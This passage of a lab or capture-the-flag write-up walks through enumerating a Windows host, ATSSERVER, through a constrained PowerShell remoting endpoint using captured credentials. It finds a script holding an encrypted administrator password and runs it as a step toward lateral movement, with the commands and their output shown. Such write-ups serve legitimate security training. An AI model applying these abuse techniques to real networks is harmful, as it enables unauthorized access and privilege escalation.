Initial Foothold to ATSSERVER
Lateral Movement is made to the imonks user via the PowerShell’s Invoke-Command cmdlet
While this is the initial foothold to the ATSSERVER host, performing the usual basic system enumeration appears to be out of option due to the limited amount of commands available from the dc_manage configuration
This can be checked through the PowerShell’s Get-Command cmdlet
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Get-Command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Get-Alias}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Alias cat -> Get-Content ATSSERVER
Alias cd -> Set-Location ATSSERVER
Alias echo -> Write-Output ATSSERVER
Alias ls -> Get-ChildItem ATSSERVER
Alias pwd -> Get-Location ATSSERVER
Alias sc -> Set-Content ATSSERVER
Alias type -> Get-Content ATSSERVER It’s a very basic set of cmdlets that are allowed. I will attempt to enumerate the system using those
Installed Program
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files"}
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat ATSSERVER
Protection
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files\keepmeon"}
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccess
Exception
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : ATSSERVERThere is an unusual directory; C:\Program Files\keepmeon
However, the imonks user is unable to access it
wm.ps1
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls ..\Desktop}
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 07/11/2023 04:32 34 user.txt ATSSERVER
-a---- 11/01/2022 18:04 602 wm.ps1 ATSSERVER Checking the Desktop directory of the imonks user reveals a PowerShell script; C:\Users\imonks\Desktop\wm.ps1
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {cat ..\Desktop\wm.ps1}
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $credsThe PowerShell script appears to be used to securely authenticate and execute a specific PowerShell cmdlet, Get-Volume, on the Acute-PC01 host as the jmorgan user.
- The
$securepasswdvariable contains the hexadecimal representation of the encrypted password of thejmorganuser - The script then uses the PowerShell’s ConvertTo-SecureString cmdlet to converts the encrypted standard strings above,
$securepasswd, into secure strings, which then gets used to generate a PSCredential object for network authentication- This process is exclusive to the
ATSSERVERhost by default as it uses the Windows Data Protection API for both encryption and decryption- This effectively means that only the same user account (
jmorgan) on the same computer(ATSSERVER) will be able to use this encrypted string for any operation
- This effectively means that only the same user account (
- This process is exclusive to the
PS C:\Utils> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
The command completed successfully.Additionally, the jmorgan user is a local administrator user to the Acute-PC01 host
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining Size PSComputerNa
me
----------- ------------ -------------- --------- ------------ ----------------- ------------- ---- ------------
System Reserved NTFS Fixed Healthy OK 19.66 MB 50 MB ATSSERVER
NTFS Fixed Healthy OK 82.25 MB 508 MB ATSSERVER
C NTFS Fixed Healthy OK 7.57 GB 19.45 GB ATSSERVER
D Unknown CD-ROM Healthy Unknown 0 B 0 B ATSSERVER Furthermore, the imonks user is able to execute the PowerShell script
Overall, the PowerShell script may not contain a PSCredential object with a CLEARTEXT password provided much like the previous example with the imonks user, it can still be abused as the current user, imonks, has access to it
Moving on to the Lateral Movement phase